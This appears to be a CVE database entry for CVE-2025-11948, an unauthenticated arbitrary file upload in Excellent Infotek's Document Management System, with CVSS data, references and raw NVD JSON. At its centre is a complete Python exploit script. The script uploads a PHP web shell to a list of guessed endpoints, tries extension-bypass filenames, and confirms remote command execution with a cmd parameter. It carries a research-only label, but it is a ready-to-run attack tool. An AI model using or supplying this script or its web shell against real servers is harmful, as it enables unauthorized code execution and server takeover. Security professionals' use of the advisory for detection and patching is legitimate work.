Security Vulnerability Report
CVE-2025-11948 CVSS 9.8 CRITICAL

CVE-2025-11948

Published: 2025-10-20 04:15:36
Last Modified: 2026-04-15 00:35:42

Description

Document Management System developed by Excellent Infotek has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score (v3.1 base score; the raw record below also carries a CVSS v4.0 base score of 9.3)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Excellent Infotek Document Management System (all unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
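The following code is for security research and authorized testing only. The listing describes its own upload paths as common ones for document management systems rather than endpoints specific to this product, and its form field names and storage directories are likewise a list of candidates to try, so a failed run does not show that a host is patched. For log review, the behaviour it exercises is a multipart upload of a script-type file followed by a GET request carrying a cmd parameter to a file in an upload or storage directory.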
python
#!/usr/bin/env python3 # CVE-2025-11948 - Excellent Infotek DMS Arbitrary File Upload PoC # Exploits unrestricted file upload to achieve RCE via Web Shell import requests import sys import argparse from urllib.parse import urljoin def exploit(target_url, shell_path="/uploads/"): """ Exploit arbitrary file upload vulnerability in Excellent Infotek DMS. Uploads a PHP web shell and executes system commands. """ session = requests.Session() # PHP web shell payload - simple command execution shell_content = b"""<?php if(isset($_REQUEST['cmd'])){ echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; } ?>""" # Common upload endpoints for Document Management Systems upload_endpoints = [ "/upload.php", "/document/upload", "/file/upload", "/dms/upload", "/api/upload", "/index.php?action=upload", "/includes/upload.php" ] # File names to try - bypass extension filters filenames = [ "shell.php", "shell.phtml", "shell.php5", "shell.pHp", "shell.jpg.php", # double extension bypass "shell.php;.jpg", # null byte / semicolon bypass ] for endpoint in upload_endpoints: upload_url = urljoin(target_url, endpoint) for filename in filenames: try: # Prepare multipart form data files = { "file": (filename, shell_content, "application/x-php"), "document": (filename, shell_content, "application/x-php"), "upload": (filename, shell_content, "application/x-php"), } data = { "action": "upload", "category": "document", "submit": "Upload" } print(f"[*] Trying: {upload_url} with filename: {filename}") response = session.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: # Try to find uploaded shell location in response shell_url = urljoin(target_url, shell_path + filename) # Verify shell access verify = session.get(shell_url + "?cmd=id", timeout=10) if verify.status_code == 200 and ("uid=" in verify.text or "www-data" in verify.text): print(f"[+] SUCCESS! 
Web Shell uploaded to: {shell_url}") print(f"[+] Command execution confirmed: {verify.text.strip()}") return shell_url # Try alternative paths for path in ["/uploads/", "/files/", "/documents/", "/data/", "/storage/"]: alt_url = urljoin(target_url, path + filename) verify = session.get(alt_url + "?cmd=id", timeout=10) if verify.status_code == 200 and "uid=" in verify.text: print(f"[+] SUCCESS! Web Shell at: {alt_url}") return alt_url except requests.exceptions.RequestException as e: continue print("[-] Exploit failed. Target may be patched or endpoint not found.") return None if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-11948 PoC Exploit") parser.add_argument("target", help="Target URL (e.g., http://target.com/dms)") args = parser.parse_args() print(f"[*] Targeting: {args.target}") result = exploit(args.target) if result: print(f"\n[+] Exploit successful! Access shell at: {result}?cmd=<command>") print("[+] Example: " + result + "?cmd=whoami") else: sys.exit(1)

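References

https://www.twcert.org.tw/en/cp-139-10453-43e63-2.html
https://www.twcert.org.tw/tw/cp-132-10452-72cb6-1.html
https://www.chtsecurity.com/news/3575ad9c-31f4-49de-8bc4-de85bb2eed39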

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11948", "sourceIdentifier": "[email protected]", "published": "2025-10-20T04:15:36.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Document Management System developed by Excellent Infotek has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10453-43e63-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10452-72cb6-1.html", "source": "[email protected]"}, {"url": "https://www.chtsecurity.com/news/3575ad9c-31f4-49de-8bc4-de85bb2eed39", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}